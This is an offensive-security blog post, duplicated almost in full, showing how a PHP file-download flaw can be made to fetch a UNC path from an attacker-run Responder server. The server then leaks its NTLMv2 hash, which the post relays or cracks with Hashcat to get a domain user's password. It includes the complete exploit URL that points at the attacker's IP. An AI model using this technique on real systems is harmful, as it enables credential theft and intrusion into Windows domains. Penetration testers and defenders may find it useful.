Hello All,
This blog post is demonstration of "Abuse of File download vulnerability to steal NTLMv2 Hashes".
In this scenario, web application is hosted on a machine which is part of Windows Active directory domain and allows user to download file without checking its path.
Attacker can take advantage of file download vulnerability to trigger request to attacker controlled server which is having "Responder" tool running on it to steal the NTLMv2 hash from the server. Responder tool "SMB auth server" will force target server to handover the NTLMv2 hash, later that NTLMv2 hash can be used to:
1. perform relay against any windows machine having "SMB Signing Disabled" or attacker can try to 2. crack them using hash cracking tools like Hashcat
Let's start with the web application which is having file download vulnerability and making SMB request to download file from the remote host.
Vulnerable PHP script is
http://192.168.56.200:8080/file.php?file=any_file.txt
and PHP code is
PHP script will perform file download if we specify any file and it exists on the system.
Script is considering relative as well full path, so we will take advantage of this behavior and will make SMB request to the server which is having Responder tool running on it.
Let's assume, actual request which allow user to download file is
http://192.168.56.200:8080/file.php?file=box.html
My server where Responder is running is having IP - 192.168.56.102
Now, make SMB request to Responder using vulnerable parameter and it should be like
http://target_web_server/vulnerable_script.php?parameter=\\Responder_server_IP\any_file.txt
Here, target_web_server is 192.168.56.200:8080
vulnerable_script.php is file.php with parameter "file" and Responder_server_IP is 192.168.56.102
Final URL is
http://192.168.56.200:8080/file.php?file=\\192.168.56.102\box.html
If everything goes fine, Responder will capture the NTLMv2 hashes of target server.
Above screenshot is showing that Responder captured the hash from target server and target web server is running with the privilege of Windows Active Directory user having username "user3".
Now, one can try to crack this captured hash to get the plain text password. "Hashcat" is awesome tool to perform fastest hashcracking. It support CPU/GPU hash cracking and has support for multiple hash formats. Hahcat official download website is: - https://hashcat.net/hashcat/ Download good password dictionary, here is one https://hashkiller.co.uk/downloads.aspx Run the hashcat and wait if luck is on our side.
Hashcat got the plain text password of the NTLMv2 hash captured by Responder. Now we can play around the Windows Active Directory little bit more as we have credential of one Domain User.
That's all from my side.
Thanks for reading.
Special thanks to Sean Metcalf, OJ, Vincent Yiu, Andrew Robbins, will, Benjamin Delpy, Marcello, Andrew van der Stock, g0tmi1k, Alvaro Muñoz, b33f, pancake, m3g9tr0n, Anurag Srivastava, vivek chauhan, Spirited wolf
--==[[ With Love from Team IndiShell ]]==--
This blog post is demonstration of "Abuse of File download vulnerability to steal NTLMv2 Hashes".
In this scenario, web application is hosted on a machine which is part of Windows Active directory domain and allows user to download file without checking its path.
Attacker can take advantage of file download vulnerability to trigger request to attacker controlled server which is having "Responder" tool running on it to steal the NTLMv2 hash from the server. Responder tool "SMB auth server" will force target server to handover the NTLMv2 hash, later that NTLMv2 hash can be used to:
1. perform relay against any windows machine having "SMB Signing Disabled" or attacker can try to 2. crack them using hash cracking tools like Hashcat
Let's start with the web application which is having file download vulnerability and making SMB request to download file from the remote host.
Vulnerable PHP script is
http://192.168.56.200:8080/file.php?file=any_file.txt
and PHP code is
PHP script will perform file download if we specify any file and it exists on the system.
Script is considering relative as well full path, so we will take advantage of this behavior and will make SMB request to the server which is having Responder tool running on it.
Let's assume, actual request which allow user to download file is
http://192.168.56.200:8080/file.php?file=box.html
My server where Responder is running is having IP - 192.168.56.102
Now, make SMB request to Responder using vulnerable parameter and it should be like
http://target_web_server/vulnerable_script.php?parameter=\\Responder_server_IP\any_file.txt
Here, target_web_server is 192.168.56.200:8080
vulnerable_script.php is file.php with parameter "file" and Responder_server_IP is 192.168.56.102
Final URL is
http://192.168.56.200:8080/file.php?file=\\192.168.56.102\box.html
If everything goes fine, Responder will capture the NTLMv2 hashes of target server.
Above screenshot is showing that Responder captured the hash from target server and target web server is running with the privilege of Windows Active Directory user having username "user3".
Now, one can try to crack this captured hash to get the plain text password. "Hashcat" is awesome tool to perform fastest hashcracking. It support CPU/GPU hash cracking and has support for multiple hash formats. Hahcat official download website is: - https://hashcat.net/hashcat/ Download good password dictionary, here is one https://hashkiller.co.uk/downloads.aspx Run the hashcat and wait if luck is on our side.
Hashcat got the plain text password of the NTLMv2 hash captured by Responder. Now we can play around the Windows Active Directory little bit more as we have credential of one Domain User.
That's all from my side.
Thanks for reading.
Special thanks to Sean Metcalf, OJ, Vincent Yiu, Andrew Robbins, will, Benjamin Delpy, Marcello, Andrew van der Stock, g0tmi1k, Alvaro Muñoz, b33f, pancake, m3g9tr0n, Anurag Srivastava, vivek chauhan, Spirited wolf
--==[[ With Love from Team IndiShell ]]==--
--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
0 comments